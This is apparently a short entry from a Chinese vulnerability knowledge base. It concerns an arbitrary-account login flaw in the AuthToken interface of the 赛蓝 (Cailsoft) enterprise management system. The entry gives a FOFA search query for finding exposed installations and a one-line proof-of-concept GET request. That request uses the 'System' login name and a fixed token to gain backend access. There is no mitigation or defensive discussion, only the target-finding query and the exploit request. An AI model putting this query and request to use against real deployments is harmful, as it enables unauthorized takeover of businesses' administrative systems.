赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞 赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞,该漏洞可直接登录后台。 fofa1body="www.cailsoft.com" || body="赛蓝企业管理系统" poc12GET /AuthToken/Index?loginName=System&token=c94ad0c0aee8b1f23b138484f014131f HTTP/1.1Host: 漏洞知识库 赛思 SuccezBl前台任意文件上传 上一篇 赛蓝企业管理系统DownloadBuilder任意文件读取漏洞 下一篇